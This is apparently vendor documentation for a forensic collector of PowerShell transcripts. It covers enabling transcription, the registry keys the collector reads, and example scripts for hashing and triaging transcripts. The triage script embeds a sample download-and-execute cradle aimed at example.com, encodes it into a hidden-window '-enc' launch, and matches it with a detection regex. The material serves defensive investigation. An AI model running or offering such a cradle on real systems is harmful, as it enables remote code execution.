Powershell Logs
Overview
Evidence: Powershell Logs
Description: Collect Powershell Logs
Category: System
Platform: windows
Short Name: pwrs
Is Parsed: No
Sent to Investigation Hub: Yes
Collect File(s): Yes
Background
PowerShell transcription records each PowerShell session to a text file: a header identifying the user, machine, host process and start time, then every command as typed together with its output. It is off by default. It is enabled machine- or user-wide through the Group Policy setting "Turn on PowerShell Transcription", which writes the values under the Transcription policy key that this collector reads, or for a single session by calling Start-Transcript.
Because a transcript captures what actually ran and what came back, it is extremely valuable for detecting malicious PowerShell usage. Transcripts are plain text files, and the transcribed user can usually write to the directory they land in, so point OutputDirectory at a location users cannot list or delete (Microsoft recommends a write-only share); otherwise an attacker can simply remove the record of their own session.
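The following script is an added example, not code from this collector or from Microsoft: it turns on host-wide transcription by writing the same policy values the Group Policy setting writes, then confirms that a fresh powershell.exe process is transcribed. It assumes C:\Transcripts as the output directory and must run elevated.

```powershell
# Added example; not part of the collector. Writes the three policy values that
# "Turn on PowerShell Transcription" sets, then verifies a new host is transcribed.
# Assumption: C:\Transcripts is the chosen output directory. In production use a
# write-only share or a directory users cannot list or delete.
$key    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
$outDir = 'C:\Transcripts'   # assumed location for this example

if (-not (Test-Path -Path $key))    { New-Item -Path $key -Force | Out-Null }
if (-not (Test-Path -Path $outDir)) { New-Item -Path $outDir -ItemType Directory | Out-Null }

# EnableTranscripting turns the feature on, EnableInvocationHeader adds a timestamp
# header per command, OutputDirectory replaces the default of the user's Documents folder.
New-ItemProperty -Path $key -Name EnableTranscripting    -PropertyType DWord  -Value 1       -Force | Out-Null
New-ItemProperty -Path $key -Name EnableInvocationHeader -PropertyType DWord  -Value 1       -Force | Out-Null
New-ItemProperty -Path $key -Name OutputDirectory        -PropertyType String -Value $outDir -Force | Out-Null

# Show the effective values (what Group Policy would have written).
Get-ItemProperty -Path $key | Select-Object EnableTranscripting, EnableInvocationHeader, OutputDirectory

# Smoke test: the policy is read when a host starts, so a new process is transcribed at
# once. Policy-driven transcripts are written to a YYYYMMDD subfolder of OutputDirectory.
Start-Process -FilePath powershell.exe -ArgumentList '-NoProfile', '-Command', 'whoami' -Wait -WindowStyle Hidden
Get-ChildItem -Path $outDir -Recurse -Filter 'PowerShell_transcript.*.txt' |
    Sort-Object LastWriteTime |
    Select-Object -Last 1 -ExpandProperty FullName
```

The last line should print a path of the form shown in the SourcePath example above; if nothing is printed, the policy was not picked up and the values under the key should be checked first.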
Data Collected
This collector gathers structured data about the PowerShell transcript files it collects.
Powershell Logs Data
| Field | Description | Example |
|---|---|---|
| Name | Artifact name | Powershell Log |
| Type | File or Folder | Folder |
| SourcePath | Original path on the host | C:\Transcripts\PowerShell_transcript.DESKTOP.abc123.20231015143000.txt |
| Path | Relative path in the evidence package | Other/PowerShell_transcript… |
Collection Method
This collector:
- Reads the transcript output directory from the registry:
  - HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription, OutputDirectory value
  - HKCU\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription, OutputDirectory value
- Collects all files from the configured transcript directories
Two things to keep in mind when reading the result. HKCU is the hive of the account the collector runs as, so a per-user policy set for a different logged-on user is only visible under that user's SID in HKEY_USERS. And only the Windows PowerShell policy key is consulted: transcripts started manually with Start-Transcript and no -Path go to the user's Documents folder, and PowerShell 7 (pwsh) reads its own key under HKLM\SOFTWARE\Policies\Microsoft\PowerShellCore\Transcription, so those locations need to be covered separately if they matter to the case.
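The script below is an added example that mirrors the collection logic described above; it is not the collector's own code. It resolves OutputDirectory from the HKLM policy key and from every loaded user hive under HKEY_USERS (rather than only HKCU), then inventories and hashes each file found so the evidence can be verified after transfer. The registry paths are the ones listed above; the hive enumeration and hashing are additions.

```powershell
# Added example; not the collector's own code. Resolve transcript directories from
# the policy key in HKLM and in every loaded user hive, then inventory the files.
$subKey = 'SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
$keys   = @("HKLM:\$subKey")

# HKCU only covers the account running this script. Loaded profiles under HKEY_USERS
# cover every interactively logged-on user; profiles that are not loaded are not visible.
$keys += Get-ChildItem -Path 'Registry::HKEY_USERS' |
    Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' } |
    ForEach-Object { "Registry::HKEY_USERS\$($_.PSChildName)\$subKey" }

$dirs = foreach ($k in $keys) {
    $p = Get-ItemProperty -Path $k -Name OutputDirectory -ErrorAction SilentlyContinue
    if ($p -and $p.OutputDirectory) {
        # Policy values may contain environment variables; expand before use.
        [Environment]::ExpandEnvironmentVariables($p.OutputDirectory)
    }
}
$dirs = @($dirs | Sort-Object -Unique)

if ($dirs.Count -eq 0) {
    Write-Warning 'No OutputDirectory policy value found; transcription is not configured by policy.'
    Write-Warning 'Manual Start-Transcript sessions default to each user''s Documents folder.'
}

$inventory = foreach ($d in $dirs) {
    if (-not (Test-Path -LiteralPath $d)) { Write-Warning "Configured directory missing: $d"; continue }
    # Policy-driven transcription writes into YYYYMMDD subfolders, so recurse.
    Get-ChildItem -LiteralPath $d -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{
            SourcePath   = $_.FullName
            SizeBytes    = $_.Length
            LastWriteUtc = $_.LastWriteTimeUtc
            SHA256       = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
        }
    }
}
$inventory | Format-Table -AutoSize
```

Record the SHA256 column with the evidence: a transcript belonging to a session that is still open may grow after it was copied, and the hash makes that visible rather than silently producing a mismatch later.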
Forensic Value
PowerShell transcripts provide complete visibility into PowerShell command execution. Investigators use this data to identify malicious PowerShell commands, track attacker reconnaissance activities, detect PowerShell-based lateral movement, analyze encoded or obfuscated commands, and establish complete PowerShell activity timelines. The header of each transcript carries the username, the RunAs user, the machine, the full command line of the host application (where an -EncodedCommand launch appears verbatim) and the process ID, which is the pivot into process-creation and Event Log data. Start time and End time are in the host's local time in yyyyMMddHHmmss format and should be normalised before being merged with UTC event logs.
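As an added example that is not part of the collector, the script below triages one transcript the way an investigator would: it parses the header fields, extracts the commands typed at the prompt, decodes any -EncodedCommand argument so the real payload is readable, and runs a few heuristic indicators over the plain and decoded text. The transcript is constructed for this example; its encoded command is built from a plain-text payload inside the script so the decode can be checked against the original.

```powershell
# Added example; not part of the collector. Triage a single transcript.
# The transcript below is constructed; the encoded command is generated from $payload.
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a')"   # example payload
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

$transcript = @"
**********************
Windows PowerShell transcript start
Start time: 20231015143000
Username: DESKTOP\alice
RunAs User: DESKTOP\alice
Machine: DESKTOP (Microsoft Windows NT 10.0.19045.0)
Host Application: powershell.exe -nop -w hidden -enc $encoded
Process ID: 4242
PSVersion: 5.1.19041.3693
**********************
PS C:\Users\alice> whoami
desktop\alice
PS C:\Users\alice> Get-Process lsass
**********************
Windows PowerShell transcript end
End time: 20231015143007
**********************
"@

$lines = $transcript -split "`r?`n"

# 1. Header fields. Times are the host's local time, not UTC.
$header = @{}
foreach ($line in $lines) {
    if ($line -match '^(Start time|End time|Username|RunAs User|Machine|Host Application|Process ID|PSVersion):\s*(.+)$') {
        $header[$Matches[1]] = $Matches[2]
    }
}
$start = [datetime]::ParseExact($header['Start time'], 'yyyyMMddHHmmss', $null)
$end   = [datetime]::ParseExact($header['End time'],   'yyyyMMddHHmmss', $null)

# 2. Commands typed at the prompt (the transcript echoes the prompt, then the command).
$commands = foreach ($line in $lines) {
    if ($line -match '^PS [^>]*>\s*(.+)$') { $Matches[1] }
}

# 3. Encoded commands. powershell.exe accepts any unambiguous prefix of -EncodedCommand
#    (-e, -ec, -enc, ...), so match the switch loosely and require a base64-looking argument.
$encPattern = '(?i)(?<=\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})'
$searchText = $header['Host Application'] + "`n" + ($commands -join "`n")
$decoded = foreach ($m in [regex]::Matches($searchText, $encPattern)) {
    try   { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
    catch { "<undecodable: $($m.Groups[1].Value.Substring(0, 16))...>" }
}

# 4. Heuristic indicators over plain and decoded content. Tune to the environment.
$indicators = 'Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|FromBase64String|-w(?:indowstyle)?\s+hidden|Net\.WebClient|lsass'
$hits = @($header['Host Application']) + $commands + $decoded | Where-Object { $_ -match $indicators }

[pscustomobject]@{
    User            = $header['Username']
    RunAs           = $header['RunAs User']
    Machine         = $header['Machine']
    ProcessId       = $header['Process ID']
    StartLocal      = $start
    DurationSeconds = ($end - $start).TotalSeconds
    HostApplication = $header['Host Application']
    DecodedCommands = $decoded
    Indicators      = $hits
} | Format-List
```

For this constructed input DecodedCommands contains the original $payload string, and Indicators lists the hidden-window host command line, the Get-Process lsass command and the decoded download cradle. On real evidence, run the same logic over every file in the collected directory and join on ProcessId against Sysmon or Security 4688 events to recover the parent process.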